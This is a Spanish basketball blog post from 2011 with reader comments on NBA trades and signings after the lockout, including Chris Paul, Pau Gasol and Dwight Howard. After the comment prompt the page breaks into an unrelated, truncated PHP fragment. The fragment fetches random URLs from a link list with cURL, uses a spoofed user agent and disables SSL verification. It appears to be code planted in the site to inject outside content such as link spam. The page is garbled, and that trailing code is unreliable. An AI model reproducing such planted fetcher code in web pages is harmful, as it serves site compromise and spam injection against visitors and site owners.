La locura de diciembre

10 de December de 2011 por txusma

El inicio del período de fichajes nos ha pillado a algunos de puente y totalmente incomunicados. El viernes por la tarde una breve reseña escuchada por la radio me deja helado al informarme que Chris Paul había sido traspasado a los Lakers pero que el comisionado había vetado el traspaso. Para más inri, informan que en el mismo movimiento Pau Gasol hubiese abandonado la franquicia californiana destino Houston o New Orleans. Notición tremenando en la NBA y yo perdido por la montaña…

Pero hemos vuelto y nos hemos intentado poner al día de todo. Ayer, entre los excepcionales comentaristas con los que contamos y TheDeerHunter, ya explicamos qué había pasado con Chris Paul, Pau Gasol, David Stern, los Lakers, los Hornets, Dan Gilbert, etc, etc. Hoy vamos a intentar recapitular los movimientos cerrados hasta el momento y los rumores que más suenan:

– Lakers, Hornets y Rockets se han vuelto a sentar a la mesa de las negociaciones y siguen buscando la manera de cuadrar el trade y poder llevarlo a cabo finalmente.

– El agente de Dwight Howard está en conversaciones con los New Jersey Nets, los Dallas Mavericks y… Los Angeles Lakers, evidentemente.

– Los Celtics han mandado a Glen Davis a los Magic a cambio de Brandon Bass vía sing-and-trade. Von Wafer también jugará en la franquicia de Florida. Además, están a un paso de hacerse con los servicios de David West, que firmaría por 3 años y unos 28 millones de dólares con los Hornets y luego sería traspasado y Keyon Dooling, procedente de los Bucks. Además, Chris Wilcox ha firmado por el mínimo y parece que Jeff Green se va a quedar un año más por la oferta cualificada. De confirmarse, el año que viene sería agente libre sin restricciones.

– Los Heat se han hecho con los servicios de Shane Battier y Eddie Curry y han renovado a Mario Chalmers y James Jones. El fichaje del ex de los Grizzlies me parece un acierto tremendo. De momento parece que no aplicarán la cláusula de amnistía a Mike Miller pero podrían hacerlo el verano que viene.

Tyson Chandler abandonará a los campeones y firmará por los Knicks. Si muestra el mismo nivel de implicación que en los Mavs, New York se ha hará con un gran jugador. Para completar el fichaje, la franquicia de la Gran Manzana tendrá que empaquetar a Ronny Turiaf. Suena que lo harán a Washington.

– Los Mavericks han fichado a Brandan Wright (todo un número 3 del draft) y podrían fichar también a Vince Carter que ha sido despedido de los Suns. Todo indica que el equipo de Dirk Nowitzki sufrirá muchos cambios.

– Los Nets ofrecerán 15 kilos durante 4 años al brasileño Nene. Rockets y Pacers son los otros equipos interesados. A ver qué pívot acaba en los Nets y qué pasa con Brook Lopez.

– Los Clippers se han hecho con Caron Butler. El agujero negro que era su posición de 3 queda por fin cubierto. También tendrán que rascarse el bolsillo para retener a DeAndre Jordan que interesa y mucho a Golden State Warriors.

– Día triste en Oregon. Brandon Roy anuncia su retirada a los 27 años debido a sus problemas en las rodillas. Colgaré la camiseta que me compré con su nombre en el salón de mi casa. Para compensar, los Blazers anuncian que Greg Oden continuará con ellos y que vuelve a estar lesionado… Y hace unos años era la franquicia con mejor futuro de la competición.

RIP Hamilton abandonará los Pistons mediante la formula del buy-out (nada de amnistía). A los Bulls les ha faltado tiempo para declarar su interés. En cambio, Tayshaun Prince renueva por la franquicia de Joe Dumars. Era uno de los agentes libres más apetecibles por los equipos grandes. Otro, Grant Hill, también ha renovado por su equipo. Se quedará un año más en Phoenix.

– Sacramento Kings ha fichado a Chuck Hayes (¿el peor jugador de la historia en conseguir un triple doble?) a cambio de 21 kilos en 4 años. Por lo menos han acertado renovando a Marcus Thorton

– Los Hawks se han hecho con Tracy McGrady. Es leer este nombre y me entra una melancolía…

Gilbert Arenas se ha convertido oficialmente en el primer jugador al cual se le ha aplicado la cláusula de amnistía. Baron Davis podría ser el siguiente. Interesante comprobar donde van a parar estos jugadores.

¡Qué siga la fiesta!

Comenta

16 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    La verdad es que sí, Txusma, este invierno nuclear se ha convertido en una locura nuclear. Hay fichajes y novedades a cada hora, y lo que se publica ahora dentro de 15 minutos ya no tiene nada que ver, y si lo intentas analizar fríamente y desde lejos, se te cuelan otros 15 trades que trastocan otra vez todo el mercado y ya no vale nada de lo que has analizado… En fin, algo de locos. Este año la regular season es más fast food que nunca y va a ser difícil de digerir y de entender. Casi todas las noches 10 partidos y un ritmo vertiginoso. Para los equipos veteranos… mal. Yo creo que puede ser la temporada de los Thunder. De momento no han hecho nada de ruido en los traspasos pero está claro que tienen potencial para liarla. Creo que Dallas la caga con Vince Carter… es opinión personal eh?

      Citar

  2. The wolf dice:
    #2

    Se confirma lo de tyson chandler y se habla de Rasual butler a raptors…

      Citar

  3. HisRoyalAirness dice:
    #3

    Si fuese Pau y pudiesemeter mano en mi traspaso me iba de cabeza a los Bulls ( y que los Bulls amnistiaran a Boozer).
    Os imaginais un Rose-Rip Hamilton-Deng-Pau y Noah? Anillo ya.
    Ya sé que se me está yendo la pinza, pero no más que a los GM. Sólo falta que los Heat tradeen a Lebron por Rashard Lewis o algo así…

      Citar

  4. Nacho dice:
    #4

    Acabo de caer en la cuenta. Houston tiene un precontrato con Deron, por eso sueltan a Kevin Martin, y por eso prefieren a Pau sobre Scola. Les falta el 5 para completar el equipo. Marc? Nene?
    Sí, ya se que es una gilipollez, pero es que si no no entiendo lo de los Rockets.
    Más mal que bien entiendo a LAL por lo de tener una estrella tras Kobe y parchear luego un poquito el equipo, se habla de Landry. Obviamente lo de NOH es entendible, pero lo de HOU… o es con una paja mental como lo de antes o que venga dios y lo vea, o que el dueño se ha hecho amante de la piba del maestro ZEN, y luego amnistían a Pau que vuelve a LA. Y entretanto los Heat viéndolas venir y buscándose pasta para un 5.

      Citar

  5. Ru dice:
    #5

    Lo de CP3-Gasol está a punto de caramelo según se comenta y parece que poca cosa cambia porque Houston sigue dando a Scola y Kevin Martin,lo que en perspectiva paugasoliana es una jo***a mi**d*.

    Chandler a los Knicks y Billups amnistiado,¿qué equipo podría contar con él?Detroit¿? xDD.Dudo mucho que se retire.

      Citar

  6. Denise dice:
    #6

    Pues parece que el trade Lakers-Hornets-Rockets está a punto de hacerse oficial.

    Bajo mi punto de vista, cagada brutal de Lakers que sólo se vería maquillada con el fichaje de Howard, aunque muy tonto serían en Orlando si lo cambiasen a pelo por Bynum..
    En Houston, Pau recordaría algunos de sus años como Grizzlies…ó peor. Me gustaría que le dieran amnistía y fichase por los Clippers, equipo que me gusta como están haciendo las cosas y va a dar mucha guerra en los próximos años. Y ojalá acaben fichando a Iguodala por Kaman y Aminu..
    Y el más beneficiado, los Hornets haciendose con Scola, Martin, Dragic y Odom (aunque éste último me da que va a pasar un poco del tema y se dejará llevar)

      Citar

  7. safd dice:
    #7

    Vladimir Radmanovic a los Hawks

      Citar

  8. safd dice:
    #8

    Ah, y tb preguntan por Gilbert Arenas y el S&T de Jamaal Crawford con chicago parece cada vez mas cerca, la base seria Jamaal por Brewer, veremos como termina

      Citar

  9. Esteban dice:
    #9

    billups a el HEAT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

      Citar

  10. The wolf dice:
    #10

    Dicen que los knicks han firmado a bibby y que van a por barea que le gusta mucho a d’antony…para mi la cagan con lo de bibby….se han precipitado

      Citar

  11. The wolf dice:
    #11

    a todo esto si estais liados o se os ha escapado algo os recomiendo:

    http://www.nbamaniacs.com/tabla-de-mercado-nba/

      Citar

  12. CAMPO2 dice:
    #12

    Esto de las “Trade exception” es una milonga para hacer traspasos gratis o solo me lo parece a mi?

      Citar

  13. Pop dice:
    #13

    Según Hoopshype, Howard ha solicitado a los Magic su traspaso a los Nets…

    Jared Dudley en Twitter: So I heard Dwight Howard ask to be Traded!! I’m not shocked by that at all BUT to the NETS!!! Why not Chicago or the Lakers even the Mavs???

      Citar

  14. Vader dice:
    #14

    Pues pq será amiguito de Deron…

      Citar

  15. Pop dice:
    #15

    Vader: Pues pq será amiguito de Deron…

    Es una de las razones que más se comentan.

      Citar

  16. Txusma dice:
    #16

    Irse a los Lakers significa estar a la sombra de Kobe Bryant. A lo mejor a Dwight Howard no le apetece nada. Al menos lo de NJ puede convertirse en un proyecto común entre Deron y él.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>